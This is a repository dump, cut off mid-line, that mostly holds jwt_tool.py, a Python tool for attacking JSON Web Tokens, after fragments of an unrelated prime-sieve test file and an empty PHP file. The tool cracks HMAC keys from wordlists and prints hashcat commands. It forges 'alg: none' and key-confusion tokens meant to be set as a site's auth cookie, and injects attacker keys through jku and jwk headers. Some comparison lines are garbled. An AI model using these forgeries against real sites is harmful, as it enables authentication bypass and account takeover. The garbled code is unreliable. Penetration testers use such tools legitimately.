test(sieveOfAtkin,sieve_wheel_30,n) 356 | # test(sieveOfAtkin,primesfrom3to,n) 357 | # test(sieveOfAtkin,primesfrom2to,n) 358 | # test(sieveOfAtkin,rwh_primes,n) 359 | # test(sieveOfAtkin,rwh_primes1,n) 360 | # test(sieveOfAtkin,rwh_primes2,n) 361 | -------------------------------------------------------------------------------- /grab.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /jwt_tool.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # JWT_Tool version 1.3.2 (23_11_2019) 4 | # Written by ticarpi 5 | # Please use responsibly... 6 | # Software URL: https://github.com/ticarpi/jwt_tool 7 | # Web: https://www.ticarpi.com 8 | # Twitter: @ticarpi 9 | # 10 | 11 | import sys 12 | import hashlib 13 | import hmac 14 | import base64 15 | import json 16 | import argparse 17 | import datetime 18 | from collections import OrderedDict 19 | try: 20 | from Cryptodome.Signature import PKCS1_v1_5, DSS, pss 21 | from Cryptodome.Hash import SHA256, SHA384, SHA512 22 | from Cryptodome.PublicKey import RSA, ECC 23 | except: 24 | print("WARNING: Cryptodome libraries not imported - these are needed for asymmetric crypto signing and verifying") 25 | print("On most Linux systems you can run the following command to install:") 26 | print("pip3 install pycryptodomex\n") 27 | 28 | def checkSig(sig, contents, key): 29 | quiet = False 30 | if key == "": 31 | print("Type in the key to test") 32 | key = input("> ") 33 | testKey(key.encode(), sig, contents, headDict, quiet) 34 | 35 | def checkSigKid(sig, contents): 36 | quiet = False 37 | print("\nLoading key file...") 38 | try: 39 | key1 = open(keyFile).read() 40 | print("File loaded: "+keyFile) 41 | testKey(key1.encode(), sig, contents, headDict, quiet) 42 | except: 43 | print("Could not load key file") 44 | exit(1) 45 | 46 | def crackSig(sig, contents): 47 | quiet = True 48 | if headDict["alg"][0:2] != "HS": 49 | print("Algorithm is not HMAC-SHA - cannot test against passwords, try the Verify function.") 50 | return 51 | print("\nLoading key dictionary...") 52 | try: 53 | print("File loaded: "+keyList) 54 | keyLst = open(keyList, "r", encoding='utf-8', errors='ignore') 55 | nextKey = keyLst.readline() 56 | except: 57 | print("No dictionary file loaded") 58 | exit(1) 59 | print("Testing passwords in dictionary...") 60 | utf8errors = 0 61 | wordcount = 0 62 | while nextKey: 63 | wordcount += 1 64 | try: 65 | cracked = testKey(nextKey.strip().encode('UTF-8'), sig, contents, headDict, quiet) 66 | except: 67 | cracked = False 68 | if not cracked: 69 | if wordcount % 1000000 == 0: 70 | print("[*] Tested "+str(int(wordcount/1000000))+" million passwords so far") 71 | try: 72 | nextKey = keyLst.readline() 73 | except: 74 | utf8errors += 1 75 | nextKey = keyLst.readline() 76 | else: 77 | return 78 | if cracked == False: 79 | print("\n[-] Key not in dictionary") 80 | print("\n===============================\nAs your list wasn't able to crack this token you might be better off using longer dictionaries, custom dictionaries, mangling rules, or brute force attacks.\nhashcat (https://hashcat.net/hashcat/) is ideal for this as it is highly optimised for speed. Just add your JWT to a text file, then use the following syntax to give you a good start:\n\n[*] dictionary attacks: hashcat -a 0 -m 16500 jwt.txt passlist.txt\n[*] rule-based attack: hashcat -a 0 -m 16500 jwt.txt passlist.txt -r rules/best64.rule\n[*] brute-force attack: hashcat -a 3 -m 16500 jwt.txt ?u?l?l?l?l?l?l?l -i --increment-min=6\n===============================\n") 81 | if utf8errors > 0: 82 | print(utf8errors, " UTF-8 incompatible passwords skipped") 83 | 84 | def testKey(key, sig, contents, headDict, quiet): 85 | if headDict["alg"] == "HS256": 86 | testSig = base64.urlsafe_b64encode(hmac.new(key,contents,hashlib.sha256).digest()).decode('UTF-8').strip("=") 87 | elif headDict["alg"] == "HS384": 88 | testSig = base64.urlsafe_b64encode(hmac.new(key,contents,hashlib.sha384).digest()).decode('UTF-8').strip("=") 89 | elif headDict["alg"] == "HS512": 90 | testSig = base64.urlsafe_b64encode(hmac.new(key,contents,hashlib.sha512).digest()).decode('UTF-8').strip("=") 91 | else: 92 | print("Algorithm is not HMAC-SHA - cannot test with this tool.") 93 | exit(1) 94 | if testSig == sig: 95 | cracked = True 96 | if len(key) > 25: 97 | print("\n[+] "+key[0:25].decode('UTF-8')+"...(output trimmed) is the CORRECT key!") 98 | else: 99 | print("\n[+] "+key.decode('UTF-8')+" is the CORRECT key!") 100 | return cracked 101 | else: 102 | cracked = False 103 | if quiet == False: 104 | if len(key) > 25: 105 | print("[-] "+key[0:25].decode('UTF-8')+"...(output trimmed) is not the correct key") 106 | else: 107 | print("[-] "+key.decode('UTF-8')+" is not the correct key") 108 | return cracked 109 | 110 | def buildHead(alg, headDict): 111 | newHead = headDict 112 | newHead["alg"] = alg 113 | newHead = base64.urlsafe_b64encode(json.dumps(newHead,separators=(",",":")).encode()).decode('UTF-8').strip("=") 114 | return newHead 115 | 116 | def newRSAKeyPair(): 117 | new_key = RSA.generate(2048, e=65537) 118 | pubKey = new_key.publickey().exportKey("PEM") 119 | privKey = new_key.exportKey("PEM") 120 | return pubKey, privKey 121 | 122 | def newECKeyPair(): 123 | new_key = ECC.generate(curve='P-256') 124 | pubKey = new_key.public_key().export_key(format="PEM") 125 | privKey = new_key.export_key(format="PEM") 126 | return pubKey, privKey 127 | 128 | def signToken(headDict, paylDict, key, keyLength): 129 | newHead = headDict 130 | newHead["alg"] = "HS"+str(keyLength) 131 | if keyLength == 384: 132 | newContents = base64.urlsafe_b64encode(json.dumps(newHead,separators=(",",":")).encode()).decode('UTF-8').strip("=")+"."+base64.urlsafe_b64encode(json.dumps(paylDict,separators=(",",":")).encode()).decode('UTF-8').strip("=") 133 | newSig = base64.urlsafe_b64encode(hmac.new(key.encode(),newContents.encode(),hashlib.sha384).digest()).decode('UTF-8').strip("=") 134 | badSig = base64.b64encode(hmac.new(key.encode(),newContents.encode(),hashlib.sha384).digest()).decode('UTF-8').strip("=") 135 | elif keyLength == 512: 136 | newContents = base64.urlsafe_b64encode(json.dumps(newHead,separators=(",",":")).encode()).decode('UTF-8').strip("=")+"."+base64.urlsafe_b64encode(json.dumps(paylDict,separators=(",",":")).encode()).decode('UTF-8').strip("=") 137 | newSig = base64.urlsafe_b64encode(hmac.new(key.encode(),newContents.encode(),hashlib.sha512).digest()).decode('UTF-8').strip("=") 138 | badSig = base64.b64encode(hmac.new(key.encode(),newContents.encode(),hashlib.sha512).digest()).decode('UTF-8').strip("=") 139 | else: 140 | newContents = base64.urlsafe_b64encode(json.dumps(newHead,separators=(",",":")).encode()).decode('UTF-8').strip("=")+"."+base64.urlsafe_b64encode(json.dumps(paylDict,separators=(",",":")).encode()).decode('UTF-8').strip("=") 141 | newSig = base64.urlsafe_b64encode(hmac.new(key.encode(),newContents.encode(),hashlib.sha256).digest()).decode('UTF-8').strip("=") 142 | badSig = base64.b64encode(hmac.new(key.encode(),newContents.encode(),hashlib.sha256).digest()).decode('UTF-8').strip("=") 143 | return newSig, badSig, newContents 144 | 145 | def jwksGen(headDict, paylDict, jku, privateKey, kid="jwt_tool"): 146 | newHead = headDict 147 | nowtime = str(int(datetime.datetime.now().timestamp())) 148 | if privateKey: 149 | key = RSA.importKey(open(privateKey).read()) 150 | pubKey = key.publickey().exportKey("PEM") 151 | privKey = key.export_key(format="PEM") 152 | new_key = RSA.importKey(pubKey) 153 | n = base64.urlsafe_b64encode(new_key.n.to_bytes(256, byteorder='big')) 154 | e = base64.urlsafe_b64encode(new_key.e.to_bytes(3, byteorder='big')) 155 | privKeyName = privateKey 156 | else: 157 | pubKey, privKey = newRSAKeyPair() 158 | new_key = RSA.importKey(pubKey) 159 | n = base64.urlsafe_b64encode(new_key.n.to_bytes(256, byteorder='big')) 160 | e = base64.urlsafe_b64encode(new_key.e.to_bytes(3, byteorder='big')) 161 | privKeyName = "private_jwttool_RSA_"+nowtime+".pem" 162 | with open(privKeyName, 'w') as test_priv_out: 163 | test_priv_out.write(privKey.decode()) 164 | newjwks = {} 165 | newjwks["kty"] = "RSA" 166 | newjwks["kid"] = kid 167 | newjwks["use"] = "sig" 168 | newjwks["e"] = str(e.decode('UTF-8')) 169 | newjwks["n"] = str(n.decode('UTF-8').rstrip("=")) 170 | newHead["jku"] = jku 171 | newHead["alg"] = "RS256" 172 | key = RSA.importKey(privKey) 173 | newContents = base64.urlsafe_b64encode(json.dumps(newHead,separators=(",",":")).encode()).decode('UTF-8').strip("=")+"."+base64.urlsafe_b64encode(json.dumps(paylDict,separators=(",",":")).encode()).decode('UTF-8').strip("=") 174 | newContents = newContents.encode('UTF-8') 175 | h = SHA256.new(newContents) 176 | signer = PKCS1_v1_5.new(key) 177 | try: 178 | signature = signer.sign(h) 179 | except: 180 | print("Invalid Private Key") 181 | exit(1) 182 | newSig = base64.urlsafe_b64encode(signature).decode('UTF-8').strip("=") 183 | badSig = base64.b64encode(signature).decode('UTF-8').strip("=") 184 | jwksout = json.dumps(newjwks,separators=(",",":"), indent=4) 185 | jwksName = "jwks_jwttool_RSA_"+nowtime+".json" 186 | with open(jwksName, 'w') as test_jwks_out: 187 | test_jwks_out.write(jwksout) 188 | return newSig, badSig, newContents.decode('UTF-8'), jwksout, privKeyName, jwksName 189 | 190 | def jwksEmbed(headDict, paylDict): 191 | newHead = headDict 192 | pubKey, privKey = newRSAKeyPair() 193 | new_key = RSA.importKey(pubKey) 194 | n = base64.urlsafe_b64encode(new_key.n.to_bytes(256, byteorder='big')) 195 | e = base64.urlsafe_b64encode(new_key.e.to_bytes(3, byteorder='big')) 196 | jwkbuild = {} 197 | jwkbuild["kty"] = "RSA" 198 | jwkbuild["kid"] = "jwt_tool" 199 | jwkbuild["use"] = "sig" 200 | jwkbuild["e"] = str(e.decode('UTF-8')) 201 | jwkbuild["n"] = str(n.decode('UTF-8').rstrip("=")) 202 | newHead["jwk"] = jwkbuild 203 | newHead["alg"] = "RS256" 204 | key = RSA.importKey(privKey) 205 | newContents = base64.urlsafe_b64encode(json.dumps(newHead,separators=(",",":")).encode()).decode('UTF-8').strip("=")+"."+base64.urlsafe_b64encode(json.dumps(paylDict,separators=(",",":")).encode()).decode('UTF-8').strip("=") 206 | newContents = newContents.encode('UTF-8') 207 | h = SHA256.new(newContents) 208 | signer = PKCS1_v1_5.new(key) 209 | try: 210 | signature = signer.sign(h) 211 | except: 212 | print("Invalid Private Key") 213 | exit(1) 214 | newSig = base64.urlsafe_b64encode(signature).decode('UTF-8').strip("=") 215 | badSig = base64.b64encode(signature).decode('UTF-8').strip("=") 216 | return newSig, badSig, newContents.decode('UTF-8') 217 | 218 | def signTokenRSA(headDict, paylDict, privKey, keyLength): 219 | newHead = headDict 220 | newHead["alg"] = "RS"+str(keyLength) 221 | key = RSA.importKey(open(privKey).read()) 222 | newContents = base64.urlsafe_b64encode(json.dumps(newHead,separators=(",",":")).encode()).decode('UTF-8').strip("=")+"."+base64.urlsafe_b64encode(json.dumps(paylDict,separators=(",",":")).encode()).decode('UTF-8').strip("=") 223 | newContents = newContents.encode('UTF-8') 224 | if keyLength == 256: 225 | h = SHA256.new(newContents) 226 | elif keyLength == 384: 227 | h = SHA384.new(newContents) 228 | elif keyLength == 512: 229 | h = SHA512.new(newContents) 230 | else: 231 | print("Invalid RSA key length") 232 | exit(1) 233 | signer = PKCS1_v1_5.new(key) 234 | try: 235 | signature = signer.sign(h) 236 | except: 237 | print("Invalid Private Key") 238 | exit(1) 239 | newSig = base64.urlsafe_b64encode(signature).decode('UTF-8').strip("=") 240 | badSig = base64.b64encode(signature).decode('UTF-8').strip("=") 241 | return newSig, badSig, newContents.decode('UTF-8') 242 | 243 | def signTokenEC(headDict, paylDict, privKey, keyLength): 244 | newHead = headDict 245 | newHead["alg"] = "ES"+str(keyLength) 246 | key = ECC.import_key(open(privKey).read()) 247 | newContents = base64.urlsafe_b64encode(json.dumps(newHead,separators=(",",":")).encode()).decode('UTF-8').strip("=")+"."+base64.urlsafe_b64encode(json.dumps(paylDict,separators=(",",":")).encode()).decode('UTF-8').strip("=") 248 | newContents = newContents.encode('UTF-8') 249 | if keyLength == 256: 250 | h = SHA256.new(newContents) 251 | elif keyLength == 384: 252 | h = SHA384.new(newContents) 253 | elif keyLength == 512: 254 | h = SHA512.new(newContents) 255 | else: 256 | print("Invalid RSA key length") 257 | exit(1) 258 | signer = DSS.new(key, 'fips-186-3') 259 | try: 260 | signature = signer.sign(h) 261 | except: 262 | print("Invalid Private Key") 263 | exit(1) 264 | newSig = base64.urlsafe_b64encode(signature).decode('UTF-8').strip("=") 265 | badSig = base64.b64encode(signature).decode('UTF-8').strip("=") 266 | return newSig, badSig, newContents.decode('UTF-8') 267 | 268 | def signTokenPSS(headDict, paylDict, privKey, keyLength): 269 | newHead = headDict 270 | newHead["alg"] = "PS"+str(keyLength) 271 | key = RSA.importKey(open(privKey).read()) 272 | newContents = base64.urlsafe_b64encode(json.dumps(newHead,separators=(",",":")).encode()).decode('UTF-8').strip("=")+"."+base64.urlsafe_b64encode(json.dumps(paylDict,separators=(",",":")).encode()).decode('UTF-8').strip("=") 273 | newContents = newContents.encode('UTF-8') 274 | if keyLength == 256: 275 | h = SHA256.new(newContents) 276 | elif keyLength == 384: 277 | h = SHA384.new(newContents) 278 | elif keyLength == 512: 279 | h = SHA512.new(newContents) 280 | else: 281 | print("Invalid RSA key length") 282 | exit(1) 283 | try: 284 | signature = pss.new(key).sign(h) 285 | except: 286 | print("Invalid Private Key") 287 | exit(1) 288 | newSig = base64.urlsafe_b64encode(signature).decode('UTF-8').strip("=") 289 | badSig = base64.b64encode(signature).decode('UTF-8').strip("=") 290 | return newSig, badSig, newContents.decode('UTF-8') 291 | 292 | def verifyTokenRSA(headDict, paylDict, sig, pubKey): 293 | key = RSA.importKey(open(pubKey).read()) 294 | newContents = base64.urlsafe_b64encode(json.dumps(headDict,separators=(",",":")).encode()).decode('UTF-8').strip("=")+"."+base64.urlsafe_b64encode(json.dumps(paylDict,separators=(",",":")).encode()).decode('UTF-8').strip("=") 295 | newContents = newContents.encode('UTF-8') 296 | if "-" in sig: 297 | try: 298 | sig = base64.urlsafe_b64decode(sig) 299 | except: 300 | pass 301 | try: 302 | sig = base64.urlsafe_b64decode(sig+"=") 303 | except: 304 | pass 305 | try: 306 | sig = base64.urlsafe_b64decode(sig+"==") 307 | except: 308 | pass 309 | elif "+" in sig: 310 | try: 311 | sig = base64.b64decode(sig) 312 | except: 313 | pass 314 | try: 315 | sig = base64.b64decode(sig+"=") 316 | except: 317 | pass 318 | try: 319 | sig = base64.b64decode(sig+"==") 320 | except: 321 | pass 322 | else: 323 | print("Signature not Base64 encoded HEX") 324 | if headDict['alg'] == "RS256": 325 | h = SHA256.new(newContents) 326 | elif headDict['alg'] == "RS384": 327 | h = SHA384.new(newContents) 328 | elif headDict['alg'] == "RS512": 329 | h = SHA512.new(newContents) 330 | else: 331 | print("Invalid RSA algorithm") 332 | verifier = PKCS1_v1_5.new(key) 333 | try: 334 | valid = verifier.verify(h, sig) 335 | if valid: 336 | print("RSA Signature is VALID") 337 | valid = True 338 | else: 339 | print("RSA Signature is INVALID") 340 | valid = False 341 | except: 342 | print("The Public Key is invalid") 343 | return valid 344 | 345 | def verifyTokenEC(headDict, paylDict, sig, pubKey): 346 | newContents = base64.urlsafe_b64encode(json.dumps(headDict,separators=(",",":")).encode()).decode('UTF-8').strip("=")+"."+base64.urlsafe_b64encode(json.dumps(paylDict,separators=(",",":")).encode()).decode('UTF-8').strip("=") 347 | message = newContents.encode('UTF-8') 348 | if "-" in str(sig): 349 | try: 350 | signature = base64.urlsafe_b64decode(sig) 351 | except: 352 | pass 353 | try: 354 | signature = base64.urlsafe_b64decode(sig+"=") 355 | except: 356 | pass 357 | try: 358 | signature = base64.urlsafe_b64decode(sig+"==") 359 | except: 360 | pass 361 | elif "+" in str(sig): 362 | try: 363 | signature = base64.b64decode(sig) 364 | except: 365 | pass 366 | try: 367 | signature = base64.b64decode(sig+"=") 368 | except: 369 | pass 370 | try: 371 | signature = base64.b64decode(sig+"==") 372 | except: 373 | pass 374 | else: 375 | print("Signature not Base64 encoded HEX") 376 | if headDict['alg'] == "ES256": 377 | h = SHA256.new(message) 378 | elif headDict['alg'] == "ES384": 379 | h = SHA384.new(message) 380 | elif headDict['alg'] == "ES512": 381 | h = SHA512.new(message) 382 | else: 383 | print("Invalid ECDSA algorithm") 384 | pubKey = open(pubKey, "r") 385 | pub_key = ECC.import_key(pubKey.read()) 386 | verifier = DSS.new(pub_key, 'fips-186-3') 387 | try: 388 | verifier.verify(h, signature) 389 | print("ECC Signature is VALID") 390 | valid = True 391 | except: 392 | print("ECC Signature is INVALID") 393 | valid = False 394 | return valid 395 | 396 | def verifyTokenPSS(headDict, paylDict, sig, pubKey): 397 | key = RSA.importKey(open(pubKey).read()) 398 | newContents = base64.urlsafe_b64encode(json.dumps(headDict,separators=(",",":")).encode()).decode('UTF-8').strip("=")+"."+base64.urlsafe_b64encode(json.dumps(paylDict,separators=(",",":")).encode()).decode('UTF-8').strip("=") 399 | newContents = newContents.encode('UTF-8') 400 | if "-" in sig: 401 | try: 402 | sig = base64.urlsafe_b64decode(sig) 403 | except: 404 | pass 405 | try: 406 | sig = base64.urlsafe_b64decode(sig+"=") 407 | except: 408 | pass 409 | try: 410 | sig = base64.urlsafe_b64decode(sig+"==") 411 | except: 412 | pass 413 | elif "+" in sig: 414 | try: 415 | sig = base64.b64decode(sig) 416 | except: 417 | pass 418 | try: 419 | sig = base64.b64decode(sig+"=") 420 | except: 421 | pass 422 | try: 423 | sig = base64.b64decode(sig+"==") 424 | except: 425 | pass 426 | else: 427 | print("Signature not Base64 encoded HEX") 428 | if headDict['alg'] == "PS256": 429 | h = SHA256.new(newContents) 430 | elif headDict['alg'] == "PS384": 431 | h = SHA384.new(newContents) 432 | elif headDict['alg'] == "PS512": 433 | h = SHA512.new(newContents) 434 | else: 435 | print("Invalid RSA algorithm") 436 | verifier = pss.new(key) 437 | try: 438 | valid = verifier.verify(h, sig) 439 | print("RSA-PSS Signature is VALID") 440 | valid = True 441 | except: 442 | print("RSA-PSS Signature is INVALID") 443 | valid = False 444 | return valid 445 | 446 | def parseJWKS(jwksfile): 447 | jwks = open(jwksfile, "r").read() 448 | jwksDict = json.loads(jwks, object_pairs_hook=OrderedDict) 449 | nowtime = int(datetime.datetime.now().timestamp()) 450 | print("JWKS Contents:") 451 | try: 452 | keyLen = len(jwksDict["keys"]) 453 | print("Number of keys: "+str(keyLen)) 454 | i = -1 455 | for jkey in range(0,keyLen): 456 | i += 1 457 | print("\n--------") 458 | try: 459 | print("Key "+str(i+1)) 460 | kid = str(jwksDict["keys"][i]["kid"]) 461 | print("kid: "+kid) 462 | except: 463 | kid = i 464 | print("Key "+str(i+1)) 465 | for keyVal in jwksDict["keys"][i].items(): 466 | keyVal = keyVal[0] 467 | print("[+] "+keyVal+" = "+str(jwksDict["keys"][i][keyVal])) 468 | try: 469 | x = str(jwksDict["keys"][i]["x"]) 470 | y = str(jwksDict["keys"][i]["y"]) 471 | print("\nFound ECC key factors, generating a public key") 472 | pubKeyName = genECPubFromJWKS(x, y, kid, nowtime) 473 | print("[+] "+pubKeyName) 474 | print("\nAttempting to verify token using "+pubKeyName) 475 | valid = verifyTokenEC(headDict, paylDict, sig, pubKeyName) 476 | except: 477 | pass 478 | try: 479 | n = str(jwksDict["keys"][i]["n"]) 480 | e = str(jwksDict["keys"][i]["e"]) 481 | print("\nFound RSA key factors, generating a public key") 482 | pubKeyName = genRSAPubFromJWKS(n, e, kid, nowtime) 483 | print("[+] "+pubKeyName) 484 | print("\nAttempting to verify token using "+pubKeyName) 485 | valid = verifyTokenRSA(headDict, paylDict, sig, pubKeyName) 486 | except: 487 | pass 488 | except: 489 | print("Single key file") 490 | for jkey in jwksDict: 491 | print("[+] "+jkey+" = "+str(jwksDict[jkey])) 492 | try: 493 | kid = 1 494 | x = str(jwksDict["x"]) 495 | y = str(jwksDict["y"]) 496 | print("\nFound ECC key factors, generating a public key") 497 | pubKeyName = genECPubFromJWKS(x, y, kid, nowtime) 498 | print("[+] "+pubKeyName) 499 | print("\nAttempting to verify token using "+pubKeyName) 500 | valid = verifyTokenEC(headDict, paylDict, sig, pubKeyName) 501 | except: 502 | pass 503 | try: 504 | kid = 1 505 | n = str(jwksDict["n"]) 506 | e = str(jwksDict["e"]) 507 | print("\nFound RSA key factors, generating a public key") 508 | pubKeyName = genRSAPubFromJWKS(n, e, kid, nowtime) 509 | print("[+] "+pubKeyName) 510 | print("\nAttempting to verify token using "+pubKeyName) 511 | valid = verifyTokenRSA(headDict, paylDict, sig, pubKeyName) 512 | except: 513 | pass 514 | 515 | def genECPubFromJWKS(x, y, kid, nowtime): 516 | try: 517 | x = int.from_bytes(base64.urlsafe_b64decode(x), byteorder='big') 518 | except: 519 | pass 520 | try: 521 | x = int.from_bytes(base64.urlsafe_b64decode(x+"="), byteorder='big') 522 | except: 523 | pass 524 | try: 525 | x = int.from_bytes(base64.urlsafe_b64decode(x+"=="), byteorder='big') 526 | except: 527 | pass 528 | try: 529 | y = int.from_bytes(base64.urlsafe_b64decode(y), byteorder='big') 530 | except: 531 | pass 532 | try: 533 | y = int.from_bytes(base64.urlsafe_b64decode(y+"="), byteorder='big') 534 | except: 535 | pass 536 | try: 537 | y = int.from_bytes(base64.urlsafe_b64decode(y+"=="), byteorder='big') 538 | except: 539 | pass 540 | new_key = ECC.construct(curve='P-256', point_x=x, point_y=y) 541 | pubKey = new_key.public_key().export_key(format="PEM")+"\n" 542 | pubKeyName = "kid_"+str(kid)+"_"+str(nowtime)+".pem" 543 | with open(pubKeyName, 'w') as test_pub_out: 544 | test_pub_out.write(pubKey) 545 | return pubKeyName 546 | 547 | def genRSAPubFromJWKS(n, e, kid, nowtime): 548 | try: 549 | n = int.from_bytes(base64.urlsafe_b64decode(n), byteorder='big') 550 | except: 551 | pass 552 | try: 553 | n = int.from_bytes(base64.urlsafe_b64decode(n+"="), byteorder='big') 554 | except: 555 | pass 556 | try: 557 | n = int.from_bytes(base64.urlsafe_b64decode(n+"=="), byteorder='big') 558 | except: 559 | pass 560 | try: 561 | e = int.from_bytes(base64.urlsafe_b64decode(e), byteorder='big') 562 | except: 563 | pass 564 | try: 565 | e = int.from_bytes(base64.urlsafe_b64decode(e+"="), byteorder='big') 566 | except: 567 | pass 568 | try: 569 | e = int.from_bytes(base64.urlsafe_b64decode(e+"=="), byteorder='big') 570 | except: 571 | pass 572 | new_key = RSA.construct((n, e)) 573 | pubKey = new_key.publickey().exportKey(format="PEM") 574 | pubKeyName = "kid_"+str(kid)+"_"+str(nowtime)+".pem" 575 | with open(pubKeyName, 'w') as test_pub_out: 576 | test_pub_out.write(pubKey.decode()+"\n") 577 | return pubKeyName 578 | 579 | def checkAlgNone(headDict, tok2): 580 | print("\n====================================================================\nThis option attempts to use the \"none\" algorithm option in some \nimplementations of JWT so that the signature is stripped entirely \nand the token can be freely tampered with. \nIf successful you can use the Tamper options to forge whatever token \ncontent you like!\n====================================================================") 581 | print("\nGenerating alg-stripped tokens...") 582 | alg1 = "none" 583 | newHead1 = buildHead(alg1, headDict) 584 | CVEToken0 = newHead1+"."+tok2+"." 585 | alg = "None" 586 | newHead = buildHead(alg, headDict) 587 | CVEToken1 = newHead+"."+tok2+"." 588 | alg = "NONE" 589 | newHead = buildHead(alg, headDict) 590 | CVEToken2 = newHead+"."+tok2+"." 591 | alg = "nOnE" 592 | newHead = buildHead(alg, headDict) 593 | CVEToken3 = newHead+"."+tok2+"." 594 | print("\nSet this new token as the AUTH cookie, or session/local \nstorage data (as appropriate for the web application).\n(This will only be valid on unpatched implementations of JWT.)") 595 | print("\n====================================================================\n") 596 | print("Your new forged token:") 597 | print("\"alg\": \"none\":\n"+CVEToken0) 598 | print("\n====================================================================\nSome variants, which may work on some JWT libraries:\n") 599 | print("\"alg\": \"None\":\n"+CVEToken1+"\n") 600 | print("\"alg\": \"NONE\":\n"+CVEToken2+"\n") 601 | print("\"alg\": \"nOnE\":\n"+CVEToken3) 602 | print("====================================================================") 603 | 604 | def checkPubKey(headDict, tok2, pubKey): 605 | print("\n====================================================================\nThis option takes an available Public Key (the SSL certificate from \na webserver, for example?) and switches the RSA-signed \n(RS256/RS384/RS512) JWT that uses the Public Key as its 'secret'.\n====================================================================") 606 | try: 607 | key = open(pubKey).read() 608 | print("File loaded: "+pubKey) 609 | except: 610 | print("[-] File not found") 611 | exit(1) 612 | newHead = headDict 613 | newHead["alg"] = "HS256" 614 | newHead = base64.urlsafe_b64encode(json.dumps(headDict,separators=(",",":")).encode()).decode('UTF-8').strip("=") 615 | newTok = newHead+"."+tok2 616 | newSig = base64.urlsafe_b64encode(hmac.new(key.encode(),newTok.encode(),hashlib.sha256).digest()).decode('UTF-8').strip("=") 617 | print("\nSet this new token as the AUTH cookie, or session/local storage data (as appropriate for the web application).\n(This will only be valid on unpatched implementations of JWT.)") 618 | print("\n"+newTok+"."+newSig) 619 | 620 | def tamperToken(paylDict, headDict, sig): 621 | print("\n====================================================================\nThis option allows you to tamper with the header, contents and \nsignature of the JWT.\n====================================================================") 622 | print("\nToken header values:") 623 | while True: 624 | i = 0 625 | headList = [0] 626 | for pair in headDict: 627 | menuNum = i+1 628 | if isinstance(headDict[pair], dict): 629 | print("["+str(menuNum)+"] "+pair+" = JSON object:") 630 | for subclaim in headDict[pair]: 631 | print(" [+] "+subclaim+" = "+str(headDict[pair][subclaim])) 632 | else: 633 | print("["+str(menuNum)+"] "+pair+" = "+str(headDict[pair])) 634 | headList.append(pair) 635 | i += 1 636 | print("["+str(i+1)+"] *ADD A VALUE*") 637 | print("["+str(i+2)+"] *DELETE A VALUE*") 638 | print("[0] Continue to next step") 639 | selection = "" 640 | print("\nPlease select a field number:\n(or 0 to Continue)") 641 | try: 642 | selection = int(input("> ")) 643 | except: 644 | print("Invalid selection") 645 | exit(1) 646 | if selection0: 647 | if isinstance(headDict[headList[selection]], dict): 648 | print("\nPlease select a sub-field number for the "+pair+" claim:\n(or 0 to Continue)") 649 | newVal = OrderedDict() 650 | for subclaim in headDict[headList[selection]]: 651 | newVal[subclaim] = headDict[pair][subclaim] 652 | while True: 653 | subList = [0] 654 | s = 0 655 | # for subclaim in headDict[headList[selection]]: 656 | for subclaim in newVal: 657 | subNum = s+1 658 | print("["+str(subNum)+"] "+subclaim+" = "+str(newVal[subclaim])) 659 | s += 1 660 | subList.append(subclaim) 661 | print("["+str(s+1)+"] *ADD A VALUE*") 662 | print("["+str(s+2)+"] *DELETE A VALUE*") 663 | print("[0] Continue to next step") 664 | try: 665 | subSel = int(input("> ")) 666 | except: 667 | print("Invalid selection") 668 | exit(1) 669 | if subSel<=len(newVal) and subSel>0: 670 | selClaim = subList[subSel] 671 | print("\nCurrent value of "+selClaim+" is: "+str(newVal[selClaim])) 672 | print("Please enter new value and hit ENTER") 673 | newVal[selClaim] = input("> ") 674 | print() 675 | elif subSel == s+1: 676 | print("Please enter new Key and hit ENTER") 677 | newPair = input("> ") 678 | print("Please enter new value for "+newPair+" and hit ENTER") 679 | newVal[newPair] = input("> ") 680 | elif subSel == s+2: 681 | print("Please select a Key to DELETE and hit ENTER") 682 | s = 0 683 | for subclaim in newVal: 684 | subNum = s+1 685 | print("["+str(subNum)+"] "+subclaim+" = "+str(newVal[subclaim])) 686 | subList.append(subclaim) 687 | s += 1 688 | try: 689 | selSub = int(input("> ")) 690 | except: 691 | print("Invalid selection") 692 | exit(1) 693 | delSub = subList[selSub] 694 | del newVal[delSub] 695 | elif subSel == 0: 696 | print() 697 | break 698 | else: 699 | print("\nCurrent value of "+headList[selection]+" is: "+str(headDict[headList[selection]])) 700 | print("Please enter new value and hit ENTER") 701 | newVal = input("> ") 702 | headDict[headList[selection]] = newVal 703 | elif selection == i+1: 704 | print("Please enter new Key and hit ENTER") 705 | newPair = input("> ") 706 | print("Please enter new value for "+newPair+" and hit ENTER") 707 | newVal = input("> ") 708 | headList.append(newPair) 709 | headDict[headList[selection]] = newVal 710 | elif selection == i+2: 711 | print("Please select a Key to DELETE and hit ENTER") 712 | i = 0 713 | for pair in headDict: 714 | menuNum = i+1 715 | print("["+str(menuNum)+"] "+pair+" = "+str(headDict[pair])) 716 | headList.append(pair) 717 | i += 1 718 | try: 719 | delPair = int(input("> ")) 720 | except: 721 | print("Invalid selection") 722 | exit(1) 723 | del headDict[headList[delPair]] 724 | elif selection == 0: 725 | break 726 | else: 727 | exit(1) 728 | print("\nToken payload values:") 729 | while True: 730 | comparestamps, expiredtoken = dissectPayl(paylDict, count=True) 731 | i = 0 732 | paylList = [0] 733 | for pair in paylDict: 734 | menuNum = i+1 735 | paylList.append(pair) 736 | i += 1 737 | print("["+str(i+1)+"] *ADD A VALUE*") 738 | print("["+str(i+2)+"] *DELETE A VALUE*") 739 | if len(comparestamps) > 0: 740 | print("["+str(i+3)+"] *UPDATE TIMESTAMPS*") 741 | print("[0] Continue to next step") 742 | selection = "" 743 | print("\nPlease select a field number:\n(or 0 to Continue)") 744 | try: 745 | selection = int(input("> ")) 746 | except: 747 | print("Invalid selection") 748 | exit(1) 749 | if selection0: 750 | print("\nCurrent value of "+paylList[selection]+" is: "+str(paylDict[paylList[selection]])) 751 | print("Please enter new value and hit ENTER") 752 | newVal = input("> ") 753 | paylDict[paylList[selection]] = newVal 754 | elif selection == i+1: 755 | print("Please enter new Key and hit ENTER") 756 | newPair = input("> ") 757 | print("Please enter new value for "+newPair+" and hit ENTER") 758 | newVal = input("> ") 759 | try: 760 | newVal = int(newVal) 761 | except: 762 | pass 763 | paylList.append(newPair) 764 | paylDict[paylList[selection]] = newVal 765 | elif selection == i+2: 766 | print("Please select a Key to DELETE and hit ENTER") 767 | i = 0 768 | for pair in paylDict: 769 | menuNum = i+1 770 | print("["+str(menuNum)+"] "+pair+" = 